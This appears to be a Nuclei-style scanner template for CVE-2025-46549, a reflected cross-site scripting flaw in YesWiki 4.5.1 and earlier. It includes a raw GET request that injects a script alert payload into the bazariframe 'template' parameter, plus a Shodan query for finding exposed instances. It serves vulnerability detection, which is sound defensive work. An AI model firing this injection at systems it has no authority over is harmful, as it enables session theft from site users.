漏洞描述
YesWiki <= 4.5.1 contains a reflected cross-site scripting caused by insufficient sanitization in user input, letting attackers steal cookies and hijack sessions, exploit requires user to click malicious link.
id: CVE-2025-46549
info:
name: YesWiki <= 4.5.1 - Cross-Site Scripting
author: MuhammadWaseem
severity: medium
description: |
YesWiki <= 4.5.1 contains a reflected cross-site scripting caused by insufficient sanitization in user input, letting attackers steal cookies and hijack sessions, exploit requires user to click malicious link.
impact:
Attackers can steal cookies, hijack user sessions, deface websites, or embed malicious content.
remediation:
Update to version 4.5.4 or later.
reference:
- https://github.com/YesWiki/yeswiki/security/advisories/GHSA-r9gv-qffm-xw6f
metadata:
verified: true
max-request: 1
shodan-query: "yeswiki"
tags: cve,cve2025,yeswiki,xss
http:
- raw:
- |
GET /?BazaR/bazariframe&id=2&template=%3cscript%3ealert(document.domain)%3c%2fscript%3e HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "<script>alert(document.domain)</script>","YesWiki")'
- 'status_code == 200'
- 'contains(content_type, "text/html")'
condition: and
# digest: 4a0a0047304502200362ca1190c63e21f2923bf08de7cb7da7b574446b257e6007dfd76d97c7ed0b02210097168371a37ae69e386417974c7fa650ac4099a59a65f245bd361ac61d391a41:922c64590222798bb761d5b6d8e72950